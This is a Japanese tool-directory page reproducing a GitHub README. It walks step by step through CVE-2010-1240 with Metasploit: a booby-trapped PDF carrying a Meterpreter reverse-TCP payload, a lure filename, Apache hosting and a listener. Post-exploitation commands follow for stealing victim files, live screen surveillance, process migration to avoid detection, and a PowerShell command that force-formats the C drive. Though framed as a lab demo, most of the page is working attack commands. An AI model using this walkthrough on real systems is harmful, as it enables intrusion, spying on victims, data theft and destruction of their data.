Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Embedded-Backdoor-Connection — このデモ動画は、一見無害に見えるPDFファイルを標的に送信することで、被害者のデバイスを制御する方法を示しています。このPDFファイルには実際には埋め込みペイロードが含まれています。このエクスプロイトはCVE-2010-1240として公開されました。 | Kitploit
ツール/GitHubGitHub/omarothmann/embedded-backdoor-connection
フィッシングツールペイロード生成エクスプロイトポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育ラボと実践
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
omarothmann/embedded-backdoor-connection

Embedded-Backdoor-Connection

このデモ動画は、一見無害に見えるPDFファイルを標的に送信することで、被害者のデバイスを制御する方法を示しています。このPDFファイルには実際には埋め込みペイロードが含まれています。このエクスプロイトはCVE-2010-1240として公開されました。

リポジトリを見る
844年前未レビュー

PDFファイルによる埋め込みバックドア接続 😈

提供    

はじめに

このデモンストレーションビデオでは、無害に見えるPDFファイルを標的に送信することで、被害者のデバイスを制御する方法を紹介しています。このPDFファイルには実際には埋め込みペイロードが含まれています。このエクスプロイトはCVE-2010-1240として公開されました。

Adobe ReaderでPDFが開かれるとすぐに、私たちにだまされてセキュリティポップアップに同意したユーザーは、リバースTCP接続を介して自分のデバイスに接続されたメータープリターセッションを私たちに取得させてしまいます。その間、彼らのすべてのデータと現在の行動は私たちの監視下にあります。

Hehe~Boi

ソフトウェア/ツールのリスト

  • Metasploit
  • Adobe Reader <= 8.1.2

環境

Kali Linux         Windows 7 or 10         Adobe Reader        

  • 攻撃マシン: Kali Linux version 2021.1
  • ターゲットOS: Windows 10 (x86) or Windows 7 (x86)
  • ターゲットソフトウェア: Adobe Reader 8.1.2

詳細な手順

まず、Metasploitフレームワークにアクセスするためのコマンドラインインターフェースを提供するMSFconsoleを起動します。

root@kitploit:~
msfconsole

次に、ターゲットのWindowsプラットフォームとAdobe PDF Readerに一致するエクスプロイトを検索します。すると、被害者のWindowsマシンを乗っ取り、Adobe PDF Readerの脆弱性を悪用するために使用できるエクスプロイトの一覧が表示されます。

root@kitploit:~
search type:exploit platform:windows adobe pdf

この悪用では、以下のコマンドを使用してモジュール「adobe_pdf_embedded_exe」を選択して使用し、被害者を乗っ取るという目標を達成します。

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

また、以下のように「info」コマンドを使用してエクスプロイトの情報を確認することもできます。

root@kitploit:~
info

次に、リバースTCP接続を使用するようにペイロードを設定します。また、対話型シェルを提供するMeterpreterを使用します。これにより、コードを挿入して実行することで、被害者のマシンを調査するためのあらゆる種類の機能を簡単に使用できます。

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

次に、リッスンホストとポートを設定します。LHOSTには、攻撃マシンのIPアドレス、この場合はKaliマシンのIPアドレス(10.0.2.4)*を入力する必要があります。

  • *追記*
    • 独自のKaliマシンのIPを使用する必要があります
    • 別のポート番号を使用できます

一方、LPORTには、あまり一般的ではないポート番号を自由に設定できます。

root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

次に、INFILENAME*フラグを使用してPDFのベースとなる入力ファイルを設定します。次に、被害者が悪意のあるPDFファイルを開きたくなるようなファイル名を設定します。

  • *追記*
    • PDFファイルのパスを確認する必要があります
    • 別のファイル名を使用できます
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

「exploit」コマンドを入力してPDFと一緒にペイロードを生成する前に、オプションを再度確認できます。

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

PDFファイルを生成したら、そのファイルを/var/www/htmlに移動します。これはKaliマシンのディレクトリであり、後で被害者がPDFファイルをダウンロードするためのWebアプリケーションサーバーをホストします。

  • 注:
    • 別のファイル名を設定した場合は、正しいパスをコピーしてください!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

次に、リスナーをセットアップするために「exploit/multi/handler」を使用します。繰り返しますが、悪意のあるPDFファイルの生成時に定義したものと一致するように、ペイロード、LHOST、LPORTを設定します。その後、ペイロードを実行します。

  • 注:
    • LHOST: 独自のKaliマシンのIPアドレスに注意してください
    • LPORT: 別のポート番号を設定した場合は、正しく入力してください
    • show info または show options は実行する任意のコマンドです。
      • 実行するのは、今設定した内容を確認するためだけです
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

別のターミナルで、Apacheサーバーのステータスを確認し、/var/www/html内のPDFファイルを被害者がダウンロードできるようにホストするために実行中であることを確認します。

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Windowsマシンで、Chromeブラウザなどの任意のブラウザを開き、KaliのIP (10.0.2.4)*を入力してKaliマシンのWebアプリケーションサーバーにアクセスします。

*注: 独自のKaliマシンのIPアドレスに注意してください

次に、ユーザーを装って目的のPDFファイルを保存します。

ファイルがAdobe Reader 8.1.2で被害者によって開かれ、セキュリティメッセージのプロンプトに同意すると、Kaliマシン上でリバースTCP接続を介して接続された新しいセッションが発生したことを確認できます。

実際のシナリオでは、 埋め込みペイロードPDFを含むWebサイトをセットアップし、被害者にダウンロードさせたり、メールでファイルを添付させたりします。


エクスプロイトの結果

その後、被害者のマシンにリモートアクセスし、メータープリターセッション内で私たちが望むさらなる悪意のある動作を実行できます。

実行できることの一覧を表示する

root@kitploit:~
help

現在のディレクトリを一覧表示する

root@kitploit:~
pwd

そのディレクトリ内のファイルを一覧表示する

root@kitploit:~
ls

被害者のマシンからフォルダまたはファイルをダウンロードする

たとえば、password.txtという名前のファイルがある場合、download password.txtコマンドを実行できます。

root@kitploit:~
download [folder name | filename with extension]

被害者のマシンにファイルを作成する

もちろん、本当に邪悪なら、Windowsマシンへの接続を維持するために悪意のあるスクリプト(バックドアの埋め込み)を作成することもできます! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Windowsと対話する

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

追加

ただし、攻撃者は、メータープリターセッションでmigrateモジュールを使用してメータープリタープロセスを別のプロセスに移行することで、疑いを減らすことができます。

root@kitploit:~
meterpreter> run post/windows/manage/migrate

これにより、被害者のマシンで自動的に新しいプロセスが生成され、そこに自身を移行します。被害者はその後、感染したPDFファイルを削除できるかもしれませんが、プロセスがすでに別の場所に移動していることにはまったく気づきません。

攻撃者はさらに、コマンドプロンプト(cmd)またはPowerShellを使用してターゲットマシン上に悪意のあるスクリプトを作成し、オペレーティングシステム全体を正常に動作しないようにダウンさせることができます。

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

デモンストレーションビデオ

デモ

ツールをダウンロード